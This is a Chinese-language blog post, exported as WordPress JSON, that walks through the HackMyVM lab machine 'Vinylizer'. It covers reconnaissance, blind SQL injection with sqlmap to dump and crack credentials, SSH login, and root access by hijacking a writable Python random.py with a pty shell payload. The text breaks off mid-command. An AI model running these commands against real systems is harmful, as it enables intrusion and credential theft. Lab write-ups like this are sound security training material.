{"id":469,"date":"2024-03-27T18:38:59","date_gmt":"2024-03-27T10:38:59","guid":{"rendered":"http:\/\/162.14.82.114\/?p=469"},"modified":"2024-03-27T18:38:59","modified_gmt":"2024-03-27T10:38:59","slug":"hmv-_-vinylizer","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/469\/03\/27\/2024\/","title":{"rendered":"hmv[-_-]Vinylizer"},"content":{"rendered":"<h1>Vinylizer<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403271837208.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403271837208.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240327151300331\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403271837209.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403271837209.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240327151337903\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<p>\u5f00\u59cb\u8fdb\u884c\u653b\u51fb\u3002<\/p>\n<h2>\u4fe1\u606f\u641c\u96c6<\/h2>\n<h3>\u7aef\u53e3\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">nmap -sCV -p- 10.0.2.12<\/code><\/pre>\n<pre><code class=\"language-text\">PORT   STATE SERVICE VERSION\n22\/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   256 f8:e3:79:35:12:8b:e7:41:d4:27:9d:97:a5:14:b6:16 (ECDSA)\n|_  256 e3:8b:15:12:6b:ff:97:57:82:e5:20:58:2d:cb:55:33 (ED25519)\n80\/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))\n|_http-server-header: Apache\/2.4.52 (Ubuntu)\n|_http-title: Vinyl Records Marketplace\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<h3>\u76ee\u5f55\u626b\u63cf<\/h3>\n<pre><code>gobuster dir -u http:\/\/10.0.2.12\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,txt,html.png,jpg,zip<\/code><\/pre>\n<pre><code>\/.php                 (Status: 403) [Size: 274]\n\/img                  (Status: 301) [Size: 304] [--&gt; http:\/\/10.0.2.12\/img\/]\n\/.html.png            (Status: 403) [Size: 274]\n\/login.php            (Status: 200) [Size: 1408]\n\/.html.png            (Status: 403) [Size: 274]\n\/.php                 (Status: 403) [Size: 274]\n\/server-status        (Status: 403) [Size: 274]\nProgress: 1323360 \/ 1323366 (100.00%)<\/code><\/pre>\n<h3>\u6f0f\u6d1e\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">sudo nikto -h http:\/\/10.0.2.12<\/code><\/pre>\n<pre><code class=\"language-bash\">- Nikto v2.5.0\n---------------------------------------------------------------------------\n+ Target IP:          10.0.2.12\n+ Target Hostname:    10.0.2.12\n+ Target Port:        80\n+ Start Time:         2024-03-27 03:19:57 (GMT-4)\n---------------------------------------------------------------------------\n+ Server: Apache\/2.4.52 (Ubuntu)\n+ \/: The anti-clickjacking X-Frame-Options header is not present. See: https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Headers\/X-Frame-Options\n+ \/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https:\/\/www.netsparker.com\/web-vulnerability-scanner\/vulnerabilities\/missing-content-type-header\/\n+ No CGI Directories found (use &#039;-C all&#039; to force check all possible dirs)\n+ \/: Server may leak inodes via ETags, header found with file \/, inode: 916, size: 60f60f431ef12, mtime: gzip. See: http:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2003-1418\n+ Apache\/2.4.52 appears to be outdated (current is at least Apache\/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.\n+ OPTIONS: Allowed HTTP Methods: GET, POST, OPTIONS, HEAD .\n+ \/login.php: Cookie PHPSESSID created without the httponly flag. See: https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Cookies\n+ \/img\/: Directory indexing found.\n+ \/img\/: This might be interesting.\n+ \/login.php: Admin login page\/section found.\n+ 8102 requests: 0 error(s) and 9 item(s) reported on remote host\n+ End Time:           2024-03-27 03:20:10 (GMT-4) (13 seconds)\n---------------------------------------------------------------------------\n+ 1 host(s) tested<\/code><\/pre>\n<h3>Wappalyzer<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403271837211.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403271837211.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240327152301015\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>\u6f0f\u6d1e\u6316\u6398<\/h2>\n<h3>\u8bbf\u95ee\u654f\u611f\u76ee\u5f55<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403271837212.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403271837212.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240327152337003\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5\u5f31\u5bc6\u7801\u4ee5\u53ca\u4e07\u80fd\u5bc6\u7801\uff0c\u867d\u7136\u6ca1\u6210\u529f\uff0c\u4f46\u662f\u5b83\u5b58\u5728\u62a5\u9519\uff0c\u63d0\u793a\u7528\u6237\u4e0d\u5b58\u5728\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403271837213.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403271837213.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240327152549407\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<p>\u6293\u5305\u770b\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-text\">POST \/login.php HTTP\/1.1\nHost: 10.0.2.12\nContent-Length: 39\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nOrigin: http:\/\/10.0.2.12\nContent-Type: application\/x-www-form-urlencoded\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/121.0.6167.85 Safari\/537.36\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.7\nReferer: http:\/\/10.0.2.12\/login.php\nAccept-Encoding: gzip, deflate, br\nAccept-Language: en-US,en;q=0.9\nCookie: PHPSESSID=s499nedv7djhha1tnjjs1onjlj\nConnection: close\n\nusername=admin&amp;password=password&amp;login=<\/code><\/pre>\n<p><code>sqlmap<\/code>\u68ad\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">sqlmap -r sql.txt -p username -dbs<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403271837214.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403271837214.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240327154619801\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u662f\u4e00\u4e2a\u57fa\u4e8e\u65f6\u95f4\u7684\u76f2\u6ce8\u3002\u3002\u3002\u3002<\/p>\n<p>\u627e\u5230\u4e09\u4e2a\u6570\u636e\u5e93\u3002<\/p>\n<p>\u5c1d\u8bd5\u83b7\u53d6\u8868\uff1a<\/p>\n<pre><code class=\"language-bash\">sqlmap -l sql.txt --batch -D vinyl_marketplace --tables<\/code><\/pre>\n<pre><code class=\"language-apl\">Database: vinyl_marketplace\n[1 table]\n+-------+\n| users |\n+-------+<\/code><\/pre>\n<p>\u67e5\u770b\u5217\u503c\uff1a<\/p>\n<pre><code class=\"language-bash\">sqlmap -l sql.txt --batch -D vinyl_marketplace -T users --columns<\/code><\/pre>\n<pre><code class=\"language-apl\">[4 columns]\n+----------------+--------------+\n| Column         | Type         |\n+----------------+--------------+\n| id             | int          |\n| login_attempts | int          |\n| password       | varchar(255) |\n| username       | varchar(255) |\n+----------------+--------------+<\/code><\/pre>\n<pre><code class=\"language-bash\">sqlmap -l sql.txt --batch -D vinyl_marketplace -T users --dump<\/code><\/pre>\n<pre><code class=\"language-apl\">Table: users\n[2 entries]\n+----+----------------------------------+-----------+----------------+\n| id | password                         | username  | login_attempts |\n+----+----------------------------------+-----------+----------------+\n| 1  | 9432522ed1a8fca612b11c3980a031f6 | shopadmin | 0              |\n| 2  | password123                      | lana      | 0              |\n+----+----------------------------------+-----------+----------------+<\/code><\/pre>\n<p>\u89e3\u5bc6\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403271837215.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403271837215.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240327180712065\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u62ff\u5230\u5bc6\u7801\uff1a<\/p>\n<pre><code class=\"language-apl\">shopadmin       addicted2vinyl<\/code><\/pre>\n<p>\u5c1d\u8bd5\u767b\u5f55\uff0c\u4f46\u662f\u663e\u793a<code>Invalid password<\/code>\u3002<\/p>\n<p>\u5c1d\u8bd5ssh\u767b\u5f55\uff01<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403271837216.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403271837216.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240327181040204\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<p>\u6210\u529f\uff01<\/p>\n<h2>\u63d0\u6743<\/h2>\n<h3>\u4fe1\u606f\u641c\u96c6<\/h3>\n<pre><code class=\"language-python\">shopadmin@vinylizer:~$ ip a\n1: lo: &lt;LOOPBACK,UP,LOWER_UP&gt; mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000\n    link\/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00\n    inet 127.0.0.1\/8 scope host lo\n       valid_lft forever preferred_lft forever\n    inet6 ::1\/128 scope host \n       valid_lft forever preferred_lft forever\n2: enp0s3: &lt;BROADCAST,MULTICAST,UP,LOWER_UP&gt; mtu 1500 qdisc fq_codel state UP group default qlen 1000\n    link\/ether 08:00:27:6d:ec:17 brd ff:ff:ff:ff:ff:ff\n    inet 10.0.2.12\/24 metric 100 brd 10.0.2.255 scope global dynamic enp0s3\n       valid_lft 305sec preferred_lft 305sec\n    inet6 fe80::a00:27ff:fe6d:ec17\/64 scope link \n       valid_lft forever preferred_lft forever\nshopadmin@vinylizer:~$ sudo -l\nMatching Defaults entries for shopadmin on vinylizer:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin,\n    use_pty\n\nUser shopadmin may run the following commands on vinylizer:\n    (ALL : ALL) NOPASSWD: \/usr\/bin\/python3 \/opt\/vinylizer.py\nshopadmin@vinylizer:~$ cat \/opt\/vinylizer.py\n# @Name: Vinylizer\n# @Author: MrMidnight\n# @Version: 1.8\n\nimport json\nimport random\n\ndef load_albums(filename):\n    try:\n        with open(filename, &#039;r&#039;) as file:\n            content = file.read()\n            if not content:\n                return []\n            albums = json.loads(content)\n    except FileNotFoundError:\n        albums = []\n    except json.JSONDecodeError:\n        print(f&quot;Error decoding JSON_Config: {filename}.&quot;)\n        albums = []\n    return albums\n\ndef save_albums(filename, albums):\n    with open(filename, &#039;w&#039;) as file:\n        json.dump(albums, file, indent=None)\n\ndef print_albums(albums):\n    if not albums:\n        print(&quot;No albums available.&quot;)\n    else:\n        print(&quot;Available Albums:&quot;)\n        for album in albums:\n            print(f&quot;- {album[&#039;name&#039;]}, Sides: {&#039;, &#039;.join(album[&#039;sides&#039;])}&quot;)\n\ndef randomize_sides(album):\n    sides = list(album[&#039;sides&#039;])\n    random.shuffle(sides)\n    return {&quot;name&quot;: album[&#039;name&#039;], &quot;sides&quot;: sides}\n\ndef randomize_vinyl(albums):\n    if not albums:\n        print(&quot;No albums available. Add one with &#039;A&#039;.&quot;)\n        return None, None\n\n    random_album = random.choice(albums)\n    random_side = random.choice(random_album[&#039;sides&#039;])\n\n    return random_album[&#039;name&#039;], random_side\n\ndef add_vinyl(albums, filename, name, num_sides):\n    # Generate sides from A to the specified number\n    sides = [chr(ord(&#039;A&#039;) + i) for i in range(num_sides)]\n\n    # Add new vinyl\n    new_album = {&quot;name&quot;: name, &quot;sides&quot;: sides}\n    albums.append(new_album)\n    save_albums(filename, albums)\n    print(f&quot;Album &#039;{name}&#039; with {num_sides} sides added successfully.\\n&quot;)\n\ndef delete_vinyl(albums, filename, name):\n    for album in albums:\n        if album[&#039;name&#039;] == name:\n            albums.remove(album)\n            save_albums(filename, albums)\n            print(f&quot;Album &#039;{name}&#039; deleted successfully!\\n&quot;)\n            return\n    print(f&quot;Album &#039;{name}&#039; not found.&quot;)\n\ndef list_all(albums):\n    print_albums(albums)\n\nif __name__ == &quot;__main__&quot;:\n\n    # Banner. Dont touch!\n    print(&quot;o      &#039;O                  o\\nO       o o               O  o\\no       O                 o\\no       o                 O\\nO      O&#039; O  &#039;OoOo. O   o o  O  ooOO .oOo. `OoOo.\\n`o    o   o   o   O o   O O  o    o  OooO&#039;  o\\n `o  O    O   O   o O   o o  O   O   O      O\\n  `o&#039;     o&#039;  o   O `OoOO Oo o&#039; OooO `OoO&#039;  o\\nBy: MrMidnight          o\\n                     OoO&#039;                         \\n&quot;)\n\n    config_file = &quot;config.json&quot;\n\n    albums_config = load_albums(config_file)\n\n    while True:\n        choice = input(&quot;Do you want to (R)andomly choose a Album, (A)dd a new one, (D)elete an album, (L)ist all albums, or (Q)uit? : &quot;).upper()\n\n        if choice == &quot;R&quot;:\n            random_album, random_side = randomize_vinyl(albums_config)\n            if random_album is not None and random_side is not None:\n                print(f&quot;Randomly selected album: {random_album}, Random side: {random_side}\\n&quot;)\n\n        elif choice == &quot;A&quot;:\n            name = input(&quot;\\nEnter the name of the new album: &quot;)\n\n            while True:\n                try:\n                    num_sides = int(input(&quot;Enter the number of sides for the new album: &quot;))\n                    break  # Break the loop if the input is a integer\n                except ValueError:\n                    print(&quot;\\nInvalid input. Please enter a valid integer for the number of sides.&quot;)\n\n            add_vinyl(albums_config, config_file, name, num_sides)\n\n        elif choice == &quot;D&quot;:\n            name = input(&quot;\\nEnter the name of the album to delete: &quot;)\n            delete_vinyl(albums_config, config_file, name)\n\n        elif choice == &quot;L&quot;:\n            list_all(albums_config)\n            print(&quot;&quot;)\n\n        elif choice == &quot;Q&quot;:\n            print(&quot;\\nQuitting Vinylizer.&quot;)\n            break\n\n        else:\n            print(&quot;Invalid Input!&quot;)<\/code><\/pre>\n<p>\u8ba9AI\u8bfb\u4e00\u4e0b\uff1a<\/p>\n<blockquote>\n<p>\u8fd9\u4e2a\u4ee3\u7801\u662f\u4e00\u4e2a\u7b80\u5355\u7684 Python \u7a0b\u5e8f\uff0c\u7528\u4e8e\u7ba1\u7406\u5531\u7247\uff08\u6216\u8005\u7c7b\u4f3c\u7269\u54c1\uff09\u7684\u5217\u8868\u3002\u8ba9\u6211\u4eec\u9010\u6bb5\u89e3\u91ca\u4e00\u4e0b\u5b83\u7684\u529f\u80fd\uff1a<\/p>\n<\/blockquote>\n<ol>\n<li><code>load_albums(filename)<\/code>: \u8fd9\u4e2a\u51fd\u6570\u8d1f\u8d23\u4ece\u6587\u4ef6\u4e2d\u52a0\u8f7d\u5531\u7247\u5217\u8868\u3002\u5b83\u5c1d\u8bd5\u6253\u5f00\u6587\u4ef6\uff0c\u8bfb\u53d6\u5176\u4e2d\u7684\u5185\u5bb9\uff0c\u5e76\u5c06\u5176\u89e3\u6790\u4e3a JSON \u683c\u5f0f\u3002\u5982\u679c\u6587\u4ef6\u4e0d\u5b58\u5728\u6216\u8005\u89e3\u6790\u5931\u8d25\uff0c\u5b83\u4f1a\u8fd4\u56de\u4e00\u4e2a\u7a7a\u5217\u8868\u3002<\/li>\n<li><code>save_albums(filename, albums)<\/code>: \u8fd9\u4e2a\u51fd\u6570\u63a5\u53d7\u4e00\u4e2a\u6587\u4ef6\u540d\u548c\u4e00\u4e2a\u5531\u7247\u5217\u8868\uff0c\u5c06\u5531\u7247\u5217\u8868\u4ee5 JSON \u683c\u5f0f\u4fdd\u5b58\u5230\u6587\u4ef6\u4e2d\u3002<\/li>\n<li><code>print_albums(albums)<\/code>: \u8fd9\u4e2a\u51fd\u6570\u7528\u4e8e\u6253\u5370\u51fa\u6240\u6709\u7684\u5531\u7247\u53ca\u5176\u5305\u542b\u7684\u9762\u6570\u3002<\/li>\n<li><code>randomize_sides(album)<\/code>: \u8fd9\u4e2a\u51fd\u6570\u7528\u4e8e\u968f\u673a\u6392\u5217\u4e00\u4e2a\u5531\u7247\u7684\u9762\u6570\u3002<\/li>\n<li><code>randomize_vinyl(albums)<\/code>: \u8fd9\u4e2a\u51fd\u6570\u4ece\u7ed9\u5b9a\u7684\u5531\u7247\u5217\u8868\u4e2d\u968f\u673a\u9009\u62e9\u4e00\u5f20\u5531\u7247\uff0c\u5e76\u968f\u673a\u9009\u62e9\u5176\u4e2d\u7684\u4e00\u4e2a\u9762\u6570\u3002<\/li>\n<li><code>add_vinyl(albums, filename, name, num_sides)<\/code>: \u8fd9\u4e2a\u51fd\u6570\u7528\u4e8e\u5411\u5531\u7247\u5217\u8868\u4e2d\u6dfb\u52a0\u65b0\u7684\u5531\u7247\u3002\u5b83\u63a5\u53d7\u5531\u7247\u5217\u8868\u3001\u6587\u4ef6\u540d\u3001\u5531\u7247\u540d\u548c\u9762\u6570\u4f5c\u4e3a\u53c2\u6570\uff0c\u5e76\u5c06\u65b0\u5531\u7247\u6dfb\u52a0\u5230\u5217\u8868\u4e2d\uff0c\u7136\u540e\u4fdd\u5b58\u5230\u6587\u4ef6\u4e2d\u3002<\/li>\n<li><code>delete_vinyl(albums, filename, name)<\/code>: \u8fd9\u4e2a\u51fd\u6570\u7528\u4e8e\u4ece\u5531\u7247\u5217\u8868\u4e2d\u5220\u9664\u6307\u5b9a\u7684\u5531\u7247\u3002\u5b83\u63a5\u53d7\u5531\u7247\u5217\u8868\u3001\u6587\u4ef6\u540d\u548c\u5531\u7247\u540d\u4f5c\u4e3a\u53c2\u6570\uff0c\u5e76\u5728\u5217\u8868\u4e2d\u627e\u5230\u5e76\u5220\u9664\u5bf9\u5e94\u7684\u5531\u7247\uff0c\u7136\u540e\u4fdd\u5b58\u5230\u6587\u4ef6\u4e2d\u3002<\/li>\n<li><code>list_all(albums)<\/code>: \u8fd9\u4e2a\u51fd\u6570\u7528\u4e8e\u5217\u51fa\u6240\u6709\u7684\u5531\u7247\u53ca\u5176\u5305\u542b\u7684\u9762\u6570\u3002<\/li>\n<\/ol>\n<p>\u4f3c\u4e4e\u6ca1\u6709\u5229\u7528\u70b9\uff0c\u6ca1\u6709\u52a0\u8f7d\u4ec0\u4e48\u7cfb\u7edf\u51fd\u6570\uff0c\u7ee7\u7eed\u641c\u96c6\u4fe1\u606f\uff1a<\/p>\n<pre><code class=\"language-bash\">shopadmin@vinylizer:~$ find \/ -perm -u=s -type f 2&gt;\/dev\/null\n\/snap\/core20\/1974\/usr\/bin\/chfn\n\/snap\/core20\/1974\/usr\/bin\/chsh\n\/snap\/core20\/1974\/usr\/bin\/gpasswd\n\/snap\/core20\/1974\/usr\/bin\/mount\n\/snap\/core20\/1974\/usr\/bin\/newgrp\n\/snap\/core20\/1974\/usr\/bin\/passwd\n\/snap\/core20\/1974\/usr\/bin\/su\n\/snap\/core20\/1974\/usr\/bin\/sudo\n\/snap\/core20\/1974\/usr\/bin\/umount\n\/snap\/core20\/1974\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/snap\/core20\/1974\/usr\/lib\/openssh\/ssh-keysign\n\/snap\/snapd\/19457\/usr\/lib\/snapd\/snap-confine\n\/usr\/bin\/pkexec\n\/usr\/bin\/su\n\/usr\/bin\/sudo\n\/usr\/bin\/newgrp\n\/usr\/bin\/mount\n\/usr\/bin\/gpasswd\n\/usr\/bin\/chsh\n\/usr\/bin\/passwd\n\/usr\/bin\/chfn\n\/usr\/bin\/fusermount3\n\/usr\/bin\/umount\n\/usr\/lib\/snapd\/snap-confine\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/libexec\/polkit-agent-helper-1\n\nshopadmin@vinylizer:~$ find \/ -type f -writable 2&gt;\/dev\/null\n............\n\/proc\/2193\/projid_map\n\/proc\/2193\/setgroups\n\/proc\/2193\/timerslack_ns\n\/run\/user\/1001\/systemd\/generator.late\/app-snap\\x2duserd\\x2dautostart@autostart.service\n\/run\/user\/1001\/systemd\/generator.late\/app-polkit\\x2dgnome\\x2dauthentication\\x2dagent\\x2d1@autostart.service\n\/home\/shopadmin\/.bash_history\n\/home\/shopadmin\/.bashrc\n\/home\/shopadmin\/.profile\n\/home\/shopadmin\/.bash_logout\n\/home\/shopadmin\/.viminfo\n\/home\/shopadmin\/.cache\/motd.legal-displayed\n\/home\/shopadmin\/user.txt\n\/usr\/lib\/python3.10\/random.py<\/code><\/pre>\n<p>\u4f5c\u8005\u770b\u6765\u63d0\u793a\u6211\u4eec\u4e86\uff0c\u6211\u4eec\u53ef\u4ee5\u66f4\u6539<code>random.py<\/code>\uff0c\u4f7fsudo\u6267\u884c\u6211\u4eec\u60f3\u8981\u7684\u51fd\u6570\uff01<\/p>\n<pre><code class=\"language-bash\">shopadmin@vinylizer:~$ head \/usr\/lib\/python3.10\/random.py\nimport pty\npty.spawn(&quot;\/bin\/bash&quot;)\n&quot;&quot;&quot;Random variable generators.\n\n    bytes\n    -----\n           uniform bytes (values between 0 and 255)\n\n    integers\n    --------\nshopadmin@vinylizer:~$ sudo python3 \/opt\/vinylizer.py\nroot@vinylizer:\/home\/shopadmin# whoami;id\nroot\nuid=0(root) gid=0(root) groups=0(root)\nroot@vinylizer:\/home\/shopadmin# cd \/root;ls\nroot.txt  snap\nroot@vinylizer:~# cat root.txt\n4UD10PH1L3\nroot@vinylizer:~# cd \/home\nroot@vinylizer:\/home# ls\nmrmidnight  shopadmin\nroot@vinylizer:\/home# cd shopadmin\/\nroot@vinylizer:\/home\/shopadmin# ls\nuser.txt\nroot@vinylizer:\/home\/shopadmin# cat user.txt \nI_L0V3_V1NYL5<\/code><\/pre>\n<h2>\u989d\u5916\u6536\u83b7<\/h2>\n<p>\u89c2\u770b\u5e08\u5085\u95e8wp\u7684\u65f6\u5019\u53d1\u73b0\u4e86\u51e0\u4e2a\u53ef\u4ee5\u5b66\u4e60\u7684\u5730\u65b9\uff01<\/p>\n<h3>\u4f7f\u7528ghauri\u8fdb\u884csql\u6ce8\u5165<\/h3>\n<pre><code class=\"language-bash\">git clone https:\/\/github.com\/r0oth3x49\/ghauri.git\ncd ghauri\npip install -r requirements.txt\nsudo python3 setup.py install<\/code><\/pre>\n<pre><code class=\"language-bash\">ghauri -r sql.txt -p username --dbs\nghauri -r sql.txt -p username - dbms mysql -D vinyl_marketplace 